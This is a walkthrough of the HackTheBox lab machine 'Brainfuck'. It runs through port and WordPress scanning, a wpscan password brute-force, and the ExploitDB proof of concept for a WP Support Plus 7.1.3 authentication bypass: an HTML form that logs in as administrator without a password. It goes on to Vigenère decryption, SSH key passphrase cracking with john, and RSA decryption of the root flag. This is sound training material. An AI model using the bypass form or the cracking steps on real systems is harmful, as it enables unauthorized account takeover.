Hackthebox Brainfuck Walkthrough Link to heading
Initial Enumeration Link to heading
Port Scan Link to heading
sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.10.10.17 1 ⨯
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-07 21:40 EDT
Nmap scan report for 10.10.10.17
Host is up (0.051s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
110/tcp open pop3
143/tcp open imap
443/tcp open https
$ sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.10.10.17 1 ⨯
HHost discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-07 21:41 EDT
Nmap scan report for 10.10.10.17
Host is up (0.045s latency).
Not shown: 65532 open|filtered ports
PORT STATE SERVICE
110/udp closed pop3
143/udp closed imap
443/udp closed https
Vulnarability Scan Link to heading
ocky㉿kali)-[~/hckbox/node]
└─$ nmap -Pn -p 22,25,110,143,443 -sC -sV -oN details.txt 10.10.10.17
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-07 21:43 EDT
Nmap scan report for 10.10.10.17
Host is up (0.042s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| 256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_ 256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: CAPA RESP-CODES USER AUTH-RESP-CODE TOP SASL(PLAIN) PIPELINING UIDL
143/tcp open imap Dovecot imapd
|_imap-capabilities: ID LOGIN-REFERRALS more AUTH=PLAINA0001 have listed LITERAL+ capabilities IMAP4rev1 post-login Pre-login SASL-IR OK IDLE ENABLE
443/tcp open ssl/http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after: 2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| tls-nextprotoneg:
|_ http/1.1
Service Info: Host: brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel
There was a certificate warning on https service. The site looks like below( seems ngnix is running)
I have few hints which i got from last nmap scan
Hint1- The box name “brainfuck” is shown here Link to heading
25/tcp open smtp Postfix smtpd |_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
Hint 2- Dovecot vulnarability applicable? Link to heading
10/tcp open pop3 Dovecot pop3d |_pop3-capabilities: CAPA RESP-CODES USER AUTH-RESP-CODE TOP SASL(PLAIN) PIPELINING UIDL
Hint 3-alternatives DNS names found -should i try dns enumeration? Link to heading
443/tcp open ssl/http nginx 1.10.0 (Ubuntu) |_http-server-header: nginx/1.10.0 (Ubuntu) |_http-title: Welcome to nginx! | ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR | Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
Directrory Scan Link to heading
gobuster dir -u https://10.10.10.17 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k 1 ⨯
===============================================================
)
[ERROR] 2022/04/07 22:13:03 [!] Get "https://10.10.10.17/872560": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 120053 / 220561 (54.43%)[ERROR] 2022/04/07 22:13:03 [!] Get "https://10.10.10.17/CHIP%2001%202007": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] 2022/04/07 22:13:03 [!] Get "https
I could not get any sub directories with gobuster scan even after trying with feroxbuster.
feroxbuster -u https://10.10.10.17 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -o directory.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.5.0
───────────────────────────┬──────────────────────
🎯 Target Url │ https://10.10.10.17
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.5.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💾 Output File │ directory.txt
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
[####################] - 3m 220545/220545 0s found:0 errors:0
[####################] - 3m 220545/220545 1052/s https://10.10.10.17
Wordpress enumeration Link to heading
I have added the hostnames in host configuration and the url looks completly different now.
Hint4- wordpress site Link to heading
We have one more hint now that its a wordpress site and i am planning to use wordpress scan next.
wpscan --url https://brainfuck.htb --disable-tls-checks 255 ⨯
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.18
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: https://brainfuck.htb/ [10.10.10.17]
[+] Started: Fri Apr 8 21:21:38 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.10.0 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: https://brainfuck.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Dete
[+] WordPress theme in use: proficient
| Location: https://brainfuck.htb/wp-content/themes/proficient/
| Last Updated: 2021-12-26T00:00:00.000Z
| Readme: https://brainfuck.htb/wp-content/themes/proficient/readme.txt
| [!] The version is out of date, the latest version is 3.0.68
| Style URL: https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3
| Style Name: Proficient
| Description: Proficient is a Multipurpose WordPress theme with lots of powerful features, instantly giving a prof...
| Author: Specia
| Author URI: https://speciatheme.com/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0.6 (80% confidence)
| Found By: Style (Passive Detection)
| - https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3, Match: 'Version: 1.0.6'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] wp-support-plus-responsive-ticket-system
| Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
| Last Updated: 2019-09-03T07:57:00.000Z
| [!] The version is out of date, the latest version is 9.1.2
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 7.1.3 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:01 <=============================================================================================> (137 / 137) 100.00% Time: 00:00:01
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Apr 8 21:21:46 2022
[+] Requests Done: 173
[+] Cached Requests: 5
[+] Data Sent: 43.166 KB
[+] Data Received: 203.026 KB
[+] Memory used: 227.594 MB
[+] Elapsed time: 00:00:08
Even the aggressive scan did not reveal much except few usernames like “admin” and “administrator”.
wpscan --url https://brainfuck.htb --disable-tls-checks -e --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.18
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: https://brainfuck.htb/ [10.10.10.17]
[+] Started: Fri Apr 8 21:28:11 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.10.0 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: https://brainfuck.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: https://brainfuck.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: https://brainfuck.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
| Found By: Rss Generator (Passive Detection)
| - https://brainfuck.htb/?feed=rss2, <generator>https://wordpress.org/?v=4.7.3</generator>
| - https://brainfuck.htb/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.7.3</generator>
[+] WordPress theme in use: proficient
| Location: https://brainfuck.htb/wp-content/themes/proficient/
| Last Updated: 2021-12-26T00:00:00.000Z
| Readme: https://brainfuck.htb/wp-content/themes/proficient/readme.txt
| [!] The version is out of date, the latest version is 3.0.68
| Style URL: https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3
| Style Name: Proficient
| Description: Proficient is a Multipurpose WordPress theme with lots of powerful features, instantly giving a prof...
| Author: Specia
| Author URI: https://speciatheme.com/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0.6 (80% confidence)
| Found By: Style (Passive Detection)
| - https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3, Match: 'Version: 1.0.6'
[+] Enumerating Vulnerable Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:00:35 <==========================================================================================> (3343 / 3343) 100.00% Time: 00:00:35
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:04 <============================================================================================> (358 / 358) 100.00% Time: 00:00:04
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] No themes Found.
[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:26 <==========================================================================================> (2575 / 2575) 100.00% Time: 00:00:26
[i] No Timthumbs Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:01 <=============================================================================================> (137 / 137) 100.00% Time: 00:00:01
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports - Time: 00:00:00 <===================================================================================================> (71 / 71) 100.00% Time: 00:00:00
[i] No DB Exports Found.
[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:01 <========================================================================================> (100 / 100) 100.00% Time: 00:00:01
[i] No Medias Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==============================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] admin
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] administrator
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Apr 8 21:29:47 2022
[+] Requests Done: 6618
[+] Cached Requests: 45
[+] Data Sent: 1.767 MB
[+] Data Received: 1.242 MB
[+] Memory used: 266.418 MB
[+] Elapsed time: 00:01:36
I have tried bruteforcing the password and it did not work as well
wpscan --url https://brainfuck.htb --disable-tls-checks -U administrator -P /usr/share/SecLists-master/Passwords/Leaked-Databases/hak5.txt 1 ⨯
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.18
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: https://brainfuck.htb/ [10.10.10.17]
[+] Started: Fri Apr 8 21:44:08 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.10.0 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: https://brainfuck.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: https://brainfuck.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: https://brainfuck.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.7.3 identified (Insecure, released on 2017-03-06).
| Found By: Rss Generator (Passive Detection)
| - https://brainfuck.htb/?feed=rss2, <generator>https://wordpress.org/?v=4.7.3</generator>
| - https://brainfuck.htb/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.7.3</generator>
[+] WordPress theme in use: proficient
| Location: https://brainfuck.htb/wp-content/themes/proficient/
| Last Updated: 2021-12-26T00:00:00.000Z
| Readme: https://brainfuck.htb/wp-content/themes/proficient/readme.txt
| [!] The version is out of date, the latest version is 3.0.68
| Style URL: https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3
| Style Name: Proficient
| Description: Proficient is a Multipurpose WordPress theme with lots of powerful features, instantly giving a prof...
| Author: Specia
| Author URI: https://speciatheme.com/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0.6 (80% confidence)
| Found By: Style (Passive Detection)
| - https://brainfuck.htb/wp-content/themes/proficient/style.css?ver=4.7.3, Match: 'Version: 1.0.6'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] wp-support-plus-responsive-ticket-system
| Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
| Last Updated: 2019-09-03T07:57:00.000Z
| [!] The version is out of date, the latest version is 9.1.2
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 7.1.3 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:04 <=============================================================================================> (137 / 137) 100.00% Time: 00:00:04
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
Trying administrator / 8456162923 Time: 00:03:40 <========================================================================= > (2048 / 2351) 87.11% ETA: 00:00:33
Trying administrator / b55273236542107 Time: 00:05:03 <===============================================================================> (2351 / 2351) 100.00% Time: 00:05:03
[i] No Valid Passwords Found.
I could see the below plugin in exploitDB.
searchsploit wp support
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
WordPress Plugin WP Live Chat Support 6.2.03 - Persistent Cross-Site Scripting | php/webapps/40190.txt
WordPress Plugin WP Support Plus Responsive Ticket System 2.0 - Multiple Vulnerabilities | php/webapps/34589.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation | php/webapps/41006.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection | php/webapps/40939.txt
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
┌──(rocky㉿kali)-[~/hckbox/brainfuck]
└─$ cp /usr/share/exploitdb/exploits/php/webapps/41006.txt .
┌──(rocky㉿kali)-[~/hckbox/brainfuck]
└─$ cat 41006.txt
# Exploit Title: WP Support Plus Responsive Ticket System 7.1.3 Privilege Escalation
# Date: 10-01-2017
1. Description
You can login as anyone without knowing password because of incorrect usage of wp_set_auth_cookie().
http://security.szurek.pl/wp-support-plus-responsive-ticket-system-713-privilege-escalation.html
2. Proof of Concept
<form method="post" action="http://wp/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
Create a html file like below and access through browser locally first.
└─$ cat cookie.html
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
Then refresh the https site and you are administrator now
However the full menu like plugins seems dont appear here.
I have modified the html file to “admin” and ran “python -m http-server 80”
Now I can see the full “admin” dashboard of a wordpress site with plugin and theme details
The Passowrd does not show on settings tab. Howver we can see the password from debug tab.
Below is the password
name=‘swpsmtp_smtp_password’ value=‘kHGuERB29DNiNE’
SMTP enumeration Link to heading
I could see some reference related SMTP on main page of website as well.
I use simple telenet and SMTP commands to verify if this user exists.
telnet 10.10.10.17 25
Trying 10.10.10.17...
Connected to 10.10.10.17.
Escape character is '^]'.
220 brainfuck ESMTP Postfix (Ubuntu)
VRFY root
252 2.0.0 root
VRFY orestis
252 2.0.0 orestis
VRFY orestis@brainfuck.htb
252 2.0.0 orestis@brainfuck.htb
vrfy test
550 5.1.1 <test>: Recipient address rejected: User unknown in local recipient table
Codee 250,251,252 which means the server has accepted the request and user account is valid.But if you received a message code 550 it means invalid user account as shown in given image
Lets try login with the password we got and retrive some emails.
It give one more password for a secret forum. The name for another blog was shown during the nmap scan as well.
username: orestis password: kIEnnfEKJ#9UmdO
The secret forum identified during the nmap scan: sup3rs3cr3t.brainfuck.htb. I have added this entry as well in /etc/hosts.
After login with the new credentials, the secret forums looks like this
There are many phraces and after some trials, below phraces seems catchy
Qbqquzs - Pnhekxs dpi fca fhf zdmgzt Orestis - Hacking for fun and profit
After removing the special characters and spaces , it looks like this
QbqquzsPnhekxsdpifcafhfzdmgzt OrestisHackingforfunandprofit
Using this website i was able to decrypt
Its repeatation of “fuckmybrain” Lets use this key to decrypt the below message “mnvze://10.10.10.17/8zb5ra10m915218697q1h658wfoq0zc8/frmfycu/sp_ptr”
It decodes to “https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa”
I am able to download the key. However i am unable to ssh.
SSH does not work it seems some passowrd required
ssh -i id_rsa_kay orestis@10.10.10.17 1 ⨯
Warning: Identity file id_rsa_kay not accessible: No such file or directory.
The authenticity of host '10.10.10.17 (10.10.10.17)' can't be established.
ED25519 key fingerprint is SHA256:R2LI9xfR5z8gb7vJn7TAyhLI9RT5GEVp76CK9aoKnM8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.17' (ED25519) to the list of known hosts.
orestis@10.10.10.17: Permission denied (publickey).
I have used the ssh2john script under the /usr/share/john folder.
python2 /usr/share/john/ssh2john.py id_rsa > ssh.priv1
┌──(rocky㉿kali)-[~/hckbox/brainfuck]
└─$ ls
40939.txt alltcp.txt cookie.html directory.txt key.priv ssh2john.c ssh.priv1 wp.html
41006.txt alludp.txt details.txt id_rsa mail ssh.priv 'wp (copy 1).html'
┌──(rocky㉿kali)-[~/hckbox/brainfuck]
└─$ cat ssh.priv1
id_rsa:$sshng$1$16$6904FEF19397786F75BE2D7762AE7382$1200$9a779a83f60263c001f8e2ddae0b722aa9eb7531f09a95864cd5bda5f847b0dcfc09f19d03181c8546877a84e3feb87f0769d2e3ef426012bc211dd5b79168ecfa160428c0030598971f9c2b4c350d7a9adc0f812e5b122342b0b3d8de6ba1a25b599afd5ed6a0927e57824d23bb9f4e143238450eefa3e560d44cf54105f0c00d42624adfb31df44ceee77c09a54a99edd29c83a00cfe8f5584e969897ed220d4fd75129a29ebce8e8a516f210532588fd351fb6656a158f7514667c25d2990cf11fd2369462104ed451037ac592d2e935e74d3ee650092b3051e73b79556dda673666ff4f33d9424c9b914b3cd5ba6a33dd712785a1a63f58e63285415a20fed91ae72fac27cfd92cb15fad802574983f7b592fb5c9d5843de0a9874e8c7a674b4762f5baf04625ebfc8bd84fded869d68c2f33c1e089dc9f302daf381bd76dc000ddb0cabd1e23b33da86dfe4017e16fb7aa6632e8b1f216e2a4fd75d94b39e324effe1c82f8ce60d61594ba3e72e31a2f82bd0b2df236a467be16fe655d399cce773566a0d8e65ae5996cd3bec5bb87bae6f4b2a01221e7f601a0aa23a544a9f915497e0e57da00c1d689850a62c2d2315bc323ac3cf2065bd74d8a0f6938355d0fe8e7572022403046b59923a4fcb4bf98b3b87b4377c045fe36d8156eaba5f60b929686dab085f90e401c63e111de3fbf61e7e9c849d8b3efed7d34f5a0cf814774d54a525c3abbcd9ab232e7d92b295b6e97101e8d5433c489963940d80bde3b4d7bbd040b21d0c2e82ada4844bdc771bbbebe2f4be679f92e484efd581d3323b2013a2bec09aedb16fddce3b9e572a4075962c36ae55a0eac0695ccd56520a0c416e7429ea3a3b48f37867c057098cef65db6ae82684a5b6e6aff8ebfc8be1530ab83c872f91dcf8ebf9bf76d0f74f29f94adfd38769be3f528c1ce7b1c86aa33a20702d547c97029ba725fbdebb18505adeb0f9603a77c76c72215f5241dc06bc7d1921ca7474a2a431566d517f214eabf544e4780a4f06d7333a59ce10a87e8352a1a2dedafb9d8c32ef0c75249e96461a7259d2feb2ef1ff7a2a717b83064bb553fceddf11dee0044599f114ef4cb8e654dbe3c49c35dd48248cbf7a97f45bcf618dce3ca6ecc62032f8cc197b32cd8a9f345e671527019462c767fa207f50f31d757d76277d1851bb70fd1df84d08911548562d316b98e68b69b22a9792fed0911b799f4ee7a0da5c5a8fde05e1331f3104a5106b1d9ec684eb7a8c42239edac41401a9384483f1d30b22103e61d6dfa9b1b5cf8894c0c4c5d2c7583ee69cdb88752862011e9b5d861233713bdb97f32c4d4c16ee395641c38859b1cbd11543ebf8f64838c85c1434f3dbb0ea6929cee0256a52d58fe2fab0ca83c64d5774c86f94c0a88a9046066aa4f0af7cf46998b511427be5cbcf575fdec918945218985b002a943199dfc05a7167c68fb15c2ca17472bae6f8ddaec6b45f438b209b846b85db361c98a8d1e4438e4fb1ec82a40870038c216e79ab6149a6a1f5f8f53c7887c5ce4854634aa819210116466e08fcae8d8393caf4197b0c9df9ac7bdc7388ed91e8cbc0b10e48d26c85f200bc806bb229dda81db4e3e79a2ea10fe8f1bdba71160f2281db59961f4fb1f22090d64af11aa73f29803c2caf466f1ceef6451f84b04200f91574f0190
Using the John i am able to crack the password
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.priv1
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
3poulakia! (id_rsa)
1g 0:00:00:05 DONE (2022-04-12 10:18) 0.1897g/s 2721Kp/s 2721Kc/s 2721KC/s *7¡Vamos!..clarus
Session completed
SSH works now
ssh -i id_rsa orestis@brainfuck.htb
The authenticity of host 'brainfuck.htb (10.10.10.17)' can't be established.
ED25519 key fingerprint is SHA256:R2LI9xfR5z8gb7vJn7TAyhLI9RT5GEVp76CK9aoKnM8.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:69: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'brainfuck.htb' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-75-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
You have mail.
Last login: Mon Apr 11 16:31:25 2022 from 10.10.14.15
orestis@brainfuck:~$ id
uid=1000(orestis) gid=1000(orestis) groups=1000(orestis),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),121(lpadmin),122(sambashare)
Lets do more Crypto Link to heading
orestis@brainfuck:~$ ls
alpine-v3.15-x86_64-20220411_1049.tar.gz debug.txt encrypt.sage mail output.txt user.txt
orestis@brainfuck:~$ cat encrypt.sage
nbits = 1024
password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
m = Integer(int(password.encode('hex'),16))
p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
e = ZZ.random_element(phi)
c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')
orestis@brainfuck:~$ cat debug.txt
7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
orestis@brainfuck:~$ cat output.txt
Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
It seems the last 2 files ( debug.txt and output.txt) needs to decrypted. So we need to create a decrypt script in similiar fashion “encrypt.sage”. After googling, i could see a similiar decrypting script here.
Copy the script to my Kali machine. Then replace the p,q,e from the contents of debug.txt.
If you copy the debug.txt to a notepad it looks like 3 lines
first line you can be equal to p
second line to q and third line to e. The last line can be completly equal to the contents of output.txt
Now run the script and we got the flag
┌──(rocky㉿kali)-[~/hckbox/brainfuck]
└─$ python2 rsadecrypt.py 1 ⨯
d_hex: 0xc6eccf2d2584044e2173cf0efa88f839ee184df56ce3e6aa450cfcdf9e5ec8b4d8123c2cd57ee4bf7c84e423941191ec57a7944e31327a722143edc1981ecf24bd9b389d673a1bd44288103e501f46994b700ac1abcb15339ff0750566957064605eb9205d159360fb6b907b39ee98683b0f6f418619fcb1665c4c7fa7984e9L
